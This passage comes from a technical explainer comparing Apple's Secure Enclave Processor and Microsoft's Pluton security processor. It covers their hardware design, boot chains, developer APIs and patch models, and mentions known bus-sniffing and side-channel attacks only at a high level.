&lt;p&gt;Inside an A-series or M-series SoC, the SEP is a distinct cluster. According to Apple&apos;s published architecture, it includes (Apple Platform Security: Secure Enclave [@apple-sep-chapter]):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A dedicated processor core (not a SMT thread, not a shared core) running at a lower clock than the application cores.&lt;/li&gt;
&lt;li&gt;A Memory Protection Engine (MPE) that encrypts every cache line going to or from SEP-owned DRAM.&lt;/li&gt;
&lt;li&gt;A True Random Number Generator (TRNG) seeded by silicon noise.&lt;/li&gt;
&lt;li&gt;A hardware AES engine and a Public Key Accelerator (PKA) for ECC and RSA.&lt;/li&gt;
&lt;li&gt;A boot ROM masked in silicon at fabrication time.&lt;/li&gt;
&lt;li&gt;From A13 onward, a relationship with an external Secure Storage Component (SSC) [@apple-ssc] that provides monotonic counters and replay-protected non-volatile storage.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The lower clock speed is not an accident. Apple explicitly notes that the SEP &quot;is designed to operate efficiently at a lower clock speed that helps to protect it against clock and power attacks&quot; (Apple Platform Security [@apple-sep-chapter]). Side-channel-resistance starts at the timing budget.&lt;/p&gt;

Apple&apos;s dedicated security coprocessor, introduced in the A7 SoC in September 2013 [@apple-a-series]. Each Apple-designed SoC since contains one SEP. It runs `sepOS`, an Apple customization of the L4 microkernel, and exposes its services only via a tightly defined mailbox interface from the application processor.

The operating system the SEP runs. Apple describes it as &quot;an Apple-customized version of the L4 microkernel&quot; (Apple Platform Security: Secure Enclave [@apple-sep-chapter]). It is independent of iOS, iPadOS, or macOS, ships in the same firmware bundle as those operating systems, and is signed by Apple. The microkernel design constrains the trusted computing base and forces cross-service communication through IPC.
&lt;h3&gt;2.2 The boot chain, in order&lt;/h3&gt;
&lt;p&gt;When you press the power button, two CPUs come up at once. The application processor begins executing its boot ROM, and the SEP begins executing its own. They are independent boot processes that meet later, after both sides have verified their own firmware.&lt;/p&gt;

sequenceDiagram
    participant AP as Application Processor
    participant SEP as Secure Enclave Processor
    participant ROM as SEP Boot ROM (mask)
    participant Flash as System Storage
    Note over AP,SEP: Reset
    AP-&amp;gt;&amp;gt;AP: Execute AP Boot ROM
    SEP-&amp;gt;&amp;gt;ROM: Execute SEP Boot ROM
    ROM-&amp;gt;&amp;gt;Flash: Load sepOS image
    ROM-&amp;gt;&amp;gt;ROM: Verify signature against Apple root key
    alt Signature valid
        ROM-&amp;gt;&amp;gt;SEP: Launch sepOS
        SEP-&amp;gt;&amp;gt;SEP: Initialize MPE, derive UID-tangled keys
    else Signature invalid
        ROM-&amp;gt;&amp;gt;SEP: Halt
    end
    AP--&amp;gt;&amp;gt;SEP: Mailbox handshake
    SEP--&amp;gt;&amp;gt;AP: Available services advertised
&lt;p&gt;The SEP boot ROM is mask ROM. That phrase carries weight. It means the bits were etched into the silicon at fabrication and cannot be rewritten. Apple cannot patch the SEP boot ROM with a software update, even if Apple wants to. This is a feature -- nobody else can patch it either -- and a liability. We will return to it when we discuss checkm8.&lt;/p&gt;
&lt;p&gt;After the SEP boot ROM verifies and launches &lt;code&gt;sepOS&lt;/code&gt;, the SEP holds two values fused into the silicon at manufacture: a Unique ID (UID) and a Group ID (GID). The UID is per-device. The GID is per-product-family. Both are kept inside the SEP and never appear outside it. Keys derived from the UID are tangled to the specific piece of silicon; you cannot lift the wrapped key, move it to another phone, and unwrap it. The chip is physically the wrap-and-unwrap oracle.The UID is also why factory-reset really does erase your data. The data-protection key hierarchy roots at a key derived from the UID and a per-file random; rotate the right intermediate and every wrapped file becomes unrecoverable noise.&lt;/p&gt;
&lt;h3&gt;2.3 The Memory Protection Engine&lt;/h3&gt;
&lt;p&gt;The SEP&apos;s RAM is, physically, in the same DRAM module as everything else. A naive design would let the application processor read it. The MPE prevents that. Every cache line bound for SEP memory is encrypted with AES in XEX mode (a tweakable mode similar to disk-encryption XTS) and authenticated with a CMAC tag. The tweak includes the physical address, so an attacker cannot relocate ciphertext to a different location and have it still verify (Apple Platform Security: Secure Enclave [@apple-sep-chapter]).&lt;/p&gt;
&lt;p&gt;Starting with the A11 SoC, the MPE added an anti-replay value per protected block, with the anti-replay tree rooted in dedicated on-die SRAM. The threat that introduces is: an attacker who can capture the encrypted DRAM contents at time &lt;code&gt;T1&lt;/code&gt; and overwrite the DRAM with that snapshot at time &lt;code&gt;T2&lt;/code&gt; -- a &quot;store, rewind, replay&quot; attack. Tree-rooted anti-replay defeats it because the root in SRAM does not match the old leaves the attacker re-injected.&lt;/p&gt;
&lt;p&gt;The tweakable XEX construction has the property that two cache lines containing the same plaintext at different addresses produce different ciphertext, which prevents the pattern-leakage you get from ECB-style encryption. CMAC adds a 128-bit integrity tag.&lt;/p&gt;
&lt;p&gt;From the A14 and M1 generation onward, the MPE handles two ephemeral keys: one for SEP-private data and one for data shared with the Secure Neural Engine (used during Face ID matching). The keys are regenerated at every reset, so even capturing the DRAM ciphertext across a reboot leaks nothing.&lt;/p&gt;
&lt;h3&gt;2.4 The Secure Storage Component&lt;/h3&gt;
&lt;p&gt;Anti-hammering -- the property that a passcode-guessing attacker is rate-limited and eventually locked out -- requires reliable monotonic state that the attacker cannot rewind. Mask ROM and on-die SRAM are not enough on their own because power loss erases SRAM. From the A13 SoC onward, Apple solves this by adding a separate chip on the logic board: the Secure Storage Component (SSC) [@apple-ssc].&lt;/p&gt;
&lt;p&gt;The SSC is small, tamper-resistant, and only the SEP can talk to it. It stores monotonic counters and entropy values that the SEP uses to bind authenticated storage to wall-clock state. If you steal the phone, dump the encrypted blobs, &quot;rewind&quot; by overwriting the flash with an earlier copy, and try to brute-force the passcode again, the SSC&apos;s counters no longer match. Anti-hammering survives the rewind.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A monotonic counter sounds easy until you remember that an attacker with the physical device can pull power at any instant, including in the middle of an increment. The SSC has to atomically commit counter updates while also defending against deliberate transient brown-outs. This is the kind of thing that takes a dedicated tamper-resistant chip rather than a software loop.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;2.5 The mailbox API&lt;/h3&gt;
&lt;p&gt;Userspace apps never touch the SEP directly. The application processor reaches it through a hardware mailbox -- a small ring of registers and shared memory that defines the entire API surface from AP to SEP. The kernel exposes higher-level services on top: Touch ID and Face ID matching, Keychain entries flagged with &lt;code&gt;kSecAttrTokenIDSecureEnclave&lt;/code&gt; [@apple-keychain], Data Protection class keys, App Attest signing, and so on.&lt;/p&gt;
&lt;p&gt;The constraint is severe. The SEP exposes a fixed set of operations. No app, and no part of the OS, can ask the SEP to do something the firmware did not already implement. Compromise of the AP-side kernel does not produce an arbitrary-code-execution primitive on the SEP. It produces, at most, the ability to call SEP services from a hostile place -- and those services still require user authentication (FaceID, TouchID, passcode) before they release sensitive operations.This is the dual of the TPM 2.0 design philosophy. A TPM defines a wide command set in its spec; the firmware implements that command set; software calls those commands. The SEP defines a narrow service set bespoke to Apple&apos;s products; everything else is rejected.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The SEP is not a generic crypto coprocessor. It is a small fixed-purpose computer that knows how to do exactly the operations Apple&apos;s platforms need, and nothing else. Its security comes from being deliberately less programmable than a TPM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you had to summarize what Apple built in one sentence: they put a second computer in the phone, gave it the keys, gave it a lock on its own door, and left a slot for messages to slide through. That is the design.&lt;/p&gt;
&lt;h2&gt;3. Microsoft&apos;s answer: kill the bus, keep the standard&lt;/h2&gt;
&lt;p&gt;Apple had the luxury of designing the application processor and the security processor together. Microsoft does not. Microsoft sells software that runs on AMD, Intel, and Qualcomm silicon, on chassis from Dell, HP, Lenovo, Acer, Asus, Microsoft itself, and a long tail of others. The discrete TPM 2.0 standard fixes a contract between Windows and a piece of trusted hardware that any vendor can implement. Pluton&apos;s job was to keep that contract while removing the parts that did not survive contact with reality.&lt;/p&gt;
&lt;p&gt;The first part of reality Pluton kills is the bus.&lt;/p&gt;
&lt;h3&gt;3.1 The Xbox lineage&lt;/h3&gt;
&lt;p&gt;Microsoft did not invent Pluton for Windows. The architecture started in the original Xbox One, shipping in 2013 [@ms-pluton-learn], where it served as the security subsystem that prevented modchipping and verified the boot chain. The same architecture was extended to the Azure Sphere MT3620 microcontroller in 2018 [@ms-pluton-learn], aimed at IoT devices. The Windows variant -- the one most people mean when they say &quot;Pluton&quot; -- was announced in November 2020 [@ms-pluton-announce].&lt;/p&gt;
&lt;p&gt;The first shipping Windows silicon containing Pluton was the AMD Ryzen 6000 series (&quot;Rembrandt&quot;) in January 2022. Qualcomm Snapdragon 8cx Gen 3 and the Snapdragon X family followed in 2023-2024. Intel&apos;s first Pluton-bearing CPU was Core Ultra Series 2 (&quot;Lunar Lake&quot;) in late 2024. As of the current Microsoft documentation, the supported matrix is &quot;AMD Ryzen 6000/7000/8000/9000 and Ryzen AI Series; Intel Core Ultra 200V Series, Ultra Series 3; Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series&quot; (Microsoft Pluton Security Processor, Microsoft Learn [@ms-pluton-learn]).This is a deployment claim. Pluton&apos;s &lt;em&gt;presence&lt;/em&gt; on these CPUs is documented by the silicon vendors and Microsoft. Whether Pluton is &lt;em&gt;enabled by default&lt;/em&gt; on a given laptop varies by OEM. Practitioners verifying real fleets need to confirm via Windows&apos; Device Manager and &lt;code&gt;tpm.msc&lt;/code&gt; whether the active TPM advertises the Microsoft Pluton manufacturer ID rather than a discrete vendor.&lt;/p&gt;
&lt;h3&gt;3.2 What sits on the die&lt;/h3&gt;
&lt;p&gt;Pluton is a security subsystem placed inside the SoC, not on a separate chip on the motherboard. That single architectural decision eliminates the LPC/SPI bus that defeats discrete TPMs. Microsoft&apos;s framing in the announcement post: the design targets attacks &quot;where an attacker can steal or temporarily gain physical access to a PC ... on the communication channel between the CPU and TPM&quot; (Microsoft Security Blog [@ms-pluton-announce]).&lt;/p&gt;

Microsoft-authored security subsystem integrated into the SoC die of supported AMD, Intel, and Qualcomm processors. Pluton presents a TPM 2.0 interface to Windows but adds firmware-update via Windows Update and capsule, on-die placement (no external bus to sniff), and a Microsoft-maintained codebase that Microsoft describes as &quot;Rust-based&quot; from 2024 onward [@ms-pluton-learn] on AMD and Intel platforms.

Microsoft&apos;s name for keys that are &quot;never exposed outside the protected hardware, even to the Pluton firmware itself&quot; (Microsoft Security Blog, 2020 [@ms-pluton-announce]). Conceptually equivalent to Apple&apos;s UID-tangled keys: a hardware boundary that even the firmware running on top cannot cross.
&lt;p&gt;Inside the die, Pluton runs its own small processor (the vendors do not publish the ISA in customer-facing docs), with its own ROM, on-die RAM, hardware crypto engines, and a hardware-confined key store. It exchanges messages with the host through a mailbox interface analogous to SEP&apos;s, but the higher-level wire protocol it speaks back to the host is TPM 2.0.&lt;/p&gt;
&lt;h3&gt;3.3 TPM 2.0 as the personality, not the limit&lt;/h3&gt;
&lt;p&gt;Pluton implements the TPM 2.0 command set. That means BitLocker, Windows Hello, Credential Guard, System Guard, Measured Boot, and Device Health Attestation all work against Pluton with no modifications -- they think they are talking to a TPM 2.0 chip, and they are (Microsoft Pluton as TPM, Microsoft Learn [@ms-pluton-as-tpm]).&lt;/p&gt;
&lt;p&gt;TPM 2.0 compatibility is the compromise that buys Microsoft adoption. The entire Windows security stack was already designed against the TCG TPM 2.0 wire protocol. Forcing it onto a new API would have required years of platform engineering. Forcing it onto a new API and getting OEMs to adopt the new chip would have required forever.&lt;/p&gt;

You could read the Pluton design as &quot;TPM 2.0 with a software-update channel.&quot; That is mostly right and is how the documentation usually describes it. But Pluton also supports Pluton-specific paths beyond TPM 2.0 -- the Microsoft Learn documentation [@ms-pluton-learn] refers to Pluton-rooted credentials and attestation flows that ride alongside the TPM personality. The TPM interface is the lowest common denominator, not the ceiling.

flowchart TD
    subgraph Windows[&quot;Windows OS&quot;]
        BL[BitLocker]
        WH[Windows Hello]
        CG[Credential Guard]
        DHA[Device Health Attestation]
    end
    subgraph Pluton[&quot;Pluton subsystem on SoC&quot;]
        TPMpers[&quot;TPM 2.0 personality -- (PCRs, EK, AK, Quote, Seal)&quot;]
        MSrooted[&quot;Microsoft-rooted services -- (Pluton credentials, MS-signed firmware)&quot;]
    end
    BL --&amp;gt; TPMpers
    WH --&amp;gt; TPMpers
    CG --&amp;gt; TPMpers
    DHA --&amp;gt; TPMpers
    DHA --&amp;gt; MSrooted
    WH --&amp;gt; MSrooted
&lt;h3&gt;3.4 The patch channel&lt;/h3&gt;
&lt;p&gt;This is the design feature Microsoft most emphasizes and where the philosophical break with Apple is most visible. Pluton firmware can be updated through two paths (Microsoft Pluton Security Processor, Microsoft Learn [@ms-pluton-learn]):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;UEFI capsule update&lt;/strong&gt;. The Pluton firmware lives on the system&apos;s SPI flash and is loaded during early boot. A capsule update -- delivered via the same UEFI mechanism that updates BIOS -- can replace it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic loading via Windows Update&lt;/strong&gt;. Microsoft can ship a new Pluton firmware blob through Windows Update; the OS loader picks it up the next time the subsystem comes online.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Apple&apos;s update model is essentially the first path with a different label. The SEP firmware ships inside the iOS/macOS image bundle, signed by Apple, and is loaded at boot. There is no Windows-Update-style ambient channel separate from the OS image.&lt;/p&gt;

Patchable. By Microsoft. Through the channel users already trust. This is the single biggest practical advantage Pluton has over discrete TPMs, and the single biggest political problem.
&lt;p&gt;The structure of this difference is what makes the Apple-vs-Microsoft comparison sharp. Apple controls the entire silicon, OS, and update channel. The patch path is fast because everything is one vendor. Microsoft does not control the silicon -- AMD, Intel, and Qualcomm do -- but they wrote the firmware, signed it, and route it through Windows Update. The patch path is fast because Microsoft has been delivering OS-level updates to a billion machines for a quarter century.&lt;/p&gt;
&lt;h3&gt;3.5 Rust as the firmware base&lt;/h3&gt;
&lt;p&gt;In 2024 Microsoft began shipping Pluton firmware on AMD and Intel with what the documentation calls &quot;a Rust-based firmware foundation given the importance of memory safety&quot; (Microsoft Pluton Security Processor, Microsoft Learn [@ms-pluton-learn]). This is, as far as we can tell from primary sources, the most prominent shipping production use of Rust inside an x86 platform security subsystem. It addresses the most common class of TPM firmware bugs, which historically have been C memory-safety issues -- bounds errors, use-after-frees, integer overflows.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Rust eliminates the spatial and temporal memory-safety bugs that dominate CVE counts in C-based firmware. It does not prevent logic bugs, side-channel leaks, or fault-injection vulnerabilities. The faulTPM work, discussed in Section 7, exploits the underlying voltage rail rather than firmware bugs -- and the same physics apply whether the firmware is in C or Rust.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the SEP&apos;s design philosophy is &quot;small fixed-purpose computer,&quot; the Pluton design philosophy is &quot;in-die TPM 2.0 we can actually patch, written carefully enough that we will not have to patch it often.&quot; Two different bets about which property mattered most.&lt;/p&gt;
&lt;h2&gt;4. The tightly-coupled vs SoC-integrated trade-off&lt;/h2&gt;
&lt;p&gt;So far we have two architectures: SEP as a separate physical core, Pluton as an on-die subsystem. They sound different. They are different. But &quot;separate core&quot; and &quot;on-die subsystem&quot; both refuse the discrete-TPM design where the security chip is &lt;em&gt;off&lt;/em&gt; the SoC and reachable over a motherboard bus. Why did both vendors converge there, and what is the trade-off between SEP-style and Pluton-style integration?&lt;/p&gt;
&lt;h3&gt;4.1 What both reject&lt;/h3&gt;
&lt;p&gt;The discrete TPM 2.0 model is the baseline. A separate chip, often a Nuvoton, Infineon, or ST device on the motherboard [@pulse-tpm-sniff], connected to the platform via LPC, SPI, or I²C. The TCG spec it implements is excellent. The physical placement is the problem.&lt;/p&gt;
&lt;p&gt;Pulse Security&apos;s attack is the canonical demonstration. With &lt;code&gt;lpc_sniffer_tpm&lt;/code&gt; on a $40 FPGA, they probed the LPC bus of a Surface Pro 3 as it booted, captured the bytes the TPM returned for the unsealed Volume Master Key, and used those bytes to decrypt the disk (Pulse Security: TPM Sniffing [@pulse-tpm-sniff]). The TPM was working correctly. The bus was the problem. There is a mitigation -- pre-boot PIN or USB key, so the VMK is bound to something not on the wire -- but the default BitLocker configuration on most enterprise hardware does not enable it.&lt;/p&gt;

The class of physical-access attacks in which an adversary attaches probes to the motherboard bus carrying TPM responses, captures the cleartext key material the TPM legitimately returns, and uses it directly. Defended against by either eliminating the external bus (Pluton, SEP) or by requiring authenticated/encrypted sessions plus pre-boot user authentication (TPM 2.0 parameter encryption, BitLocker TPM+PIN).
&lt;p&gt;Both SEP and Pluton refuse to expose that bus. The keys never appear on an external wire. That is the structural property both architectures buy by being on the SoC.&lt;/p&gt;
&lt;h3&gt;4.2 Tightly-coupled (SEP) vs subsystem-on-die (Pluton)&lt;/h3&gt;
&lt;p&gt;After agreeing on &quot;no external bus,&quot; the two diverge sharply on what &quot;on the SoC&quot; should look like.&lt;/p&gt;

flowchart TD
    subgraph SEPDie[&quot;Apple SoC (A14, M1, M2, etc.)&quot;]
        SEPCore[&quot;SEP core -- own voltage -- own clock -- own ROM&quot;]
        MPE[&quot;Memory Protection Engine&quot;]
        APCore[&quot;Application processor cores&quot;]
        SEPCore -- mailbox --&amp;gt; APCore
        SEPCore --&amp;gt; MPE
    end
    subgraph PlutonDie[&quot;AMD/Intel/Qualcomm SoC&quot;]
        PSub[&quot;Pluton subsystem -- (may share voltage rail -- with security die area)&quot;]
        PSP[&quot;Vendor security subsystem -- (AMD PSP / Intel CSME)&quot;]
        Cores[&quot;Application cores&quot;]
        PSub -- on-die fabric --&amp;gt; Cores
        PSub -.runs on top of.-&amp;gt; PSP
    end
&lt;p&gt;The SEP is a separate physical core with its own clock, its own voltage rail, and crucially no shared microarchitecture with the application processor. That last point matters because the family of cross-thread, cross-core, and frequency-scaling side channels -- Meltdown, Spectre, Foreshadow, Hertzbleed, and their cousins -- generally requires the attacker code to be co-resident on the same physical pipeline or share a microarchitectural resource. The SEP simply does not share execution resources with potentially hostile code on the application cores (Apple Platform Security: Secure Enclave Processor [@apple-sep-chapter]).&lt;/p&gt;
&lt;p&gt;Pluton-on-AMD is implemented inside the AMD Platform Security Processor environment. Pluton-on-Intel is implemented inside Intel&apos;s Converged Security and Management Engine. These are pre-existing vendor security subsystems Microsoft layered Pluton atop. The Pluton subsystem is logically separate, with its own firmware and its own key store. Whether it has a fully separate physical voltage rail and clock domain from the application cores is not something the public documentation states clearly, and the answer almost certainly varies by silicon partner.This is a place where the comparison is hardest to make crisply. Apple has a single answer because Apple makes one SoC family. Microsoft has three answers because Pluton lives inside whatever security subsystem AMD, Intel, or Qualcomm already provide. The detail-level guarantees vary.&lt;/p&gt;
&lt;h3&gt;4.3 The SGX cautionary tale&lt;/h3&gt;
&lt;p&gt;There is a third design point worth flagging because both vendors implicitly chose against it: putting the trusted execution environment &lt;em&gt;inside&lt;/em&gt; the application CPU cores themselves. Intel SGX, introduced in 2015 [@intel-sgx], did exactly that. Enclaves were memory regions with hardware access control inside the same cores running ordinary software.&lt;/p&gt;
&lt;p&gt;SGX was a beautiful idea and an academic catastrophe. Foreshadow, ZombieLoad, SgxPectre, Plundervolt, and a long sequence of related attacks reused the side-channel-rich microarchitecture of modern Intel cores to leak enclave contents. Intel deprecated SGX on most consumer processors in 2022 [@intel-sgx-deprecation], retaining it on server SKUs for confidential computing scenarios where the threat model is different.&lt;/p&gt;
&lt;p&gt;The lesson is something both Apple and Microsoft seem to have absorbed: a trusted execution environment that shares any microarchitectural state with the workloads it must protect from is structurally compromised, because microarchitecture is too rich and too leaky to perfectly isolate. The SEP rejects this by living on its own core. Pluton rejects it by living in a separate subsystem.&lt;/p&gt;

Arm TrustZone, introduced in Arm v7 around 2008 [@arm-trustzone], pioneered the &quot;secure world / normal world&quot; split inside a single core. TrustZone is closer to SGX than it is to SEP or Pluton in this respect: secure world and normal world share the same physical pipeline. TrustZone influenced both SEP and Pluton in the sense that &quot;you need a separate execution environment for security code&quot; became table stakes; both companies then moved that environment off the application core entirely.
&lt;h3&gt;4.4 The trade-off in one sentence&lt;/h3&gt;
&lt;p&gt;A dedicated core (SEP) maximises side-channel resistance and minimises attack surface, at the cost of vendor proprietary lock-in and zero portability. An on-die subsystem (Pluton) preserves the TPM 2.0 standard, ships on three silicon vendors, and inherits the security guarantees of the underlying vendor security subsystem -- whose history, as we will see, is less reassuring than Apple&apos;s monopoly on its own silicon.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; SEP wins on isolation. Pluton wins on portability. Neither wins on both. The choice you make at the SoC level constrains every API, every patch path, and every threat-model claim downstream.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;5. The APIs developers actually call&lt;/h2&gt;
&lt;p&gt;Architectures are interesting. What ships in production code is what determines whether developers use these things correctly. The API surfaces are wildly different, and the difference matters.&lt;/p&gt;
&lt;h3&gt;5.1 Apple: SecKey, App Attest, LocalAuthentication&lt;/h3&gt;
&lt;p&gt;On Apple platforms, the SEP is exposed through a handful of frameworks. The most common entry point is &lt;code&gt;SecKey&lt;/code&gt; in the Security framework, with key attributes that bind the key to the SEP:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;kSecAttrTokenIDSecureEnclave&lt;/code&gt; makes the key SEP-resident.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;kSecAttrAccessControl&lt;/code&gt; with &lt;code&gt;LAContext&lt;/code&gt; adds biometric or passcode gating.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;kSecAttrIsPermanent&lt;/code&gt; puts it in the Keychain [@apple-keychain].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The key itself never leaves the SEP. The application receives an opaque handle. Asking the framework to sign a message turns into a mailbox call to the SEP, which evaluates the access-control policy (e.g., &quot;the user must FaceID-authenticate within the last five seconds&quot;) and either signs or refuses.&lt;/p&gt;
&lt;p&gt;{`
// This is a conceptual model of what happens when iOS code asks the SEP
// to sign a message with a key whose private half lives inside the SEP.
// The real code is Swift + Security.framework; this JS captures the logic.&lt;/p&gt;
&lt;p&gt;function generateSEPKey(accessControl) {
  // SEP generates the keypair internally
  const priv = sepRandomBytes(32);            // never leaves SEP
  const pub  = ecP256ScalarMul(priv, BASE_G);
  const blob = aesKeyWrap(sepUIDDerivedKey, priv);
  return { publicKey: pub, handle: opaque(blob), policy: accessControl };
}&lt;/p&gt;
&lt;p&gt;function sign(handle, message) {
  const policy = lookupPolicy(handle);
  // SEP enforces the access control: must the user have authenticated recently?
  if (!policy.satisfied(LAContext.current)) {
    return { error: &quot;user authentication required&quot; };
  }
  const blob = lookup(handle);
  const priv = aesKeyUnwrap(sepUIDDerivedKey, blob);
  return ecdsaP256Sign(priv, sha256(message));
}&lt;/p&gt;
&lt;p&gt;const k = generateSEPKey({ requireBiometric: true });
console.log(&quot;Public key returned to the app:&quot;, k.publicKey);
console.log(&quot;Private key location: inside SEP, never accessible to app code&quot;);
`}&lt;/p&gt;
&lt;p&gt;Beyond &lt;code&gt;SecKey&lt;/code&gt;, the SEP underpins:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;LocalAuthentication&lt;/strong&gt; -- Face ID / Touch ID matching happens inside the SEP. The biometric template never leaves the SEP, and the application is only told yes/no.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DeviceCheck and App Attest&lt;/strong&gt; -- documented in the Apple Platform Security Guide [@apple-platform-security]. App Attest gives each app installation a SEP-rooted asymmetric key whose certificate chains to Apple&apos;s CA, letting servers verify that a sign-up came from a genuine app on a genuine Apple device.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Protection / FileVault&lt;/strong&gt; -- per-file class keys are wrapped under SEP-held intermediate keys.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apple Pay&lt;/strong&gt; -- payment credentials are SEP-resident and gated on biometric/passcode authentication.&lt;/li&gt;
&lt;/ul&gt;

Apple&apos;s hardware-backed app integrity service [@apple-platform-security]. Each install of each app receives a unique SEP-resident key whose attestation certificate, signed by Apple, lets a back-end server verify that the request originates from a non-tampered installation. The closest cross-platform analogue is Google Play Integrity API; the closest discrete-TPM analogue is TPM 2.0 attestation, but App Attest is more strongly bound to the specific app installation.
&lt;h3&gt;5.2 Microsoft: TBS, NCrypt, Pluton-rooted credentials&lt;/h3&gt;
&lt;p&gt;On Windows, the TPM 2.0 personality means Pluton is reached through the same APIs as any TPM:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;TPM Base Services (TBS)&lt;/strong&gt; -- the low-level Win32 API for sending TPM 2.0 commands.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CNG (Cryptography Next Generation)&lt;/strong&gt; with &lt;code&gt;NCrypt&lt;/code&gt; and the Microsoft Platform Crypto Provider -- the higher-level key API that asks &quot;store this key in the TPM, gated on the user&apos;s PIN.&quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;BCryptDecrypt / BCryptSignHash&lt;/strong&gt; as the in-process crypto API on top.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The DPAPI key-protection model -- file/blob protection rooted in user logon credentials -- has a CNG variant documented as CNG DPAPI [@ms-cng-dpapi] that integrates with TPM-rooted hierarchies. Above that sit the consumer-facing systems: BitLocker for disk encryption [@ms-bitlocker], Windows Hello for credential storage, Credential Guard for isolating LSA secrets in a virtualization-based security enclave, and Microsoft Entra ID conditional access for cloud sign-in.&lt;/p&gt;

The TCG TPM 2.0 Library Specification [@tcg-tpm2] defines the command set, object hierarchy, and key-handling semantics of TPM 2.0 chips. Commands include `TPM2_CreatePrimary`, `TPM2_Create`, `TPM2_Load`, `TPM2_Seal`, `TPM2_Unseal`, `TPM2_Quote`, and `TPM2_Certify`. Both discrete TPMs and Pluton implement this command set.

flowchart LR
    subgraph Apple[&quot;Apple application stack&quot;]
        App[App] --&amp;gt; Sec[&quot;Security.framework -- (SecKey, SecAccessControl)&quot;]
        App --&amp;gt; LA[&quot;LocalAuthentication -- (LAContext)&quot;]
        App --&amp;gt; DC[&quot;DeviceCheck / App Attest&quot;]
        Sec --&amp;gt; Mailbox[SEP mailbox]
        LA --&amp;gt; Mailbox
        DC --&amp;gt; Mailbox
        Mailbox --&amp;gt; SEPSvc[SEP services]
    end
    subgraph MS[&quot;Windows application stack&quot;]
        WApp[App] --&amp;gt; NCrypt[&quot;CNG / NCrypt&quot;]
        WApp --&amp;gt; Hello[&quot;Windows Hello&quot;]
        WApp --&amp;gt; Entra[&quot;Entra ID / Health Attestation&quot;]
        NCrypt --&amp;gt; TBS[&quot;TPM Base Services&quot;]
        Hello --&amp;gt; TBS
        Entra --&amp;gt; TBS
        TBS --&amp;gt; Pluton[&quot;Pluton (TPM 2.0 personality)&quot;]
        Entra --&amp;gt; PlutonMS[&quot;Pluton MS-rooted services&quot;]
    end
&lt;h3&gt;5.3 What the API shape tells you&lt;/h3&gt;
&lt;p&gt;The SEP API forces every call into the small set of operations the SEP firmware implements. There is no &lt;code&gt;TPM2_PolicyLocality(2)&lt;/code&gt; equivalent or &lt;code&gt;TPM2_PolicyOR&lt;/code&gt; combinator on the SEP. You ask for a key, you ask for a signature, you ask for a biometric match, and that is mostly the surface. From a developer&apos;s point of view, the SEP feels like a very small set of well-defined building blocks.&lt;/p&gt;
&lt;p&gt;The TPM 2.0 API, by contrast, is enormous. There are several hundred commands. The TPM has policy expressions, sessions, hierarchies (storage, endorsement, platform, owner), and a half-dozen attestation primitives. This expressiveness was the right call for an open standard -- the TCG had to accommodate every conceivable use case across two decades. It also means that &quot;wrote TPM 2.0 code correctly&quot; is a measurable engineering skill rather than a default.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On Apple platforms, prefer &lt;code&gt;kSecAttrTokenIDSecureEnclave&lt;/code&gt; with &lt;code&gt;kSecAccessControl&lt;/code&gt; rather than rolling your own key handling. On Windows, prefer CNG with Microsoft Platform Crypto Provider over raw TBS unless you specifically need a TPM command not exposed by CNG. Both vendors put their good defaults in the higher-level APIs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;5.4 A note on what is &lt;em&gt;not&lt;/em&gt; exposed&lt;/h3&gt;
&lt;p&gt;Neither platform exposes the device&apos;s per-silicon root key to applications. On Apple, the UID is sealed inside the SEP; on Microsoft, the Pluton Endorsement Key is unique per chip but applications interact only with the AKs (Attestation Keys) derived from it. This is deliberate: per-device permanent keys, if exposed, enable cross-service tracking. The exposed primitives are either per-app/per-installation (App Attest), per-session (TPM2_Quote with a fresh AK), or ephemeral (a freshly-generated SEP key).&lt;/p&gt;
&lt;p&gt;That choice maps to a privacy property we will pick up in the next section: how each platform answers &quot;prove this is a real device&quot; without becoming &quot;track this specific user across every service.&quot;&lt;/p&gt;
&lt;h2&gt;6. Identity, attestation, and the privacy problem&lt;/h2&gt;
&lt;p&gt;The deepest difference between Apple and Microsoft is not architectural. It is the answer each one gives to a question that sounds simple: &lt;em&gt;what does it mean to prove a device is real?&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;6.1 Why attestation is hard&lt;/h3&gt;
&lt;p&gt;A naive answer is: burn a unique identifier into every chip and have the chip sign messages with the corresponding private key. That works for proof. It also creates a per-device pseudonym that every service can recognise and correlate. The naive answer is a surveillance disaster.&lt;/p&gt;
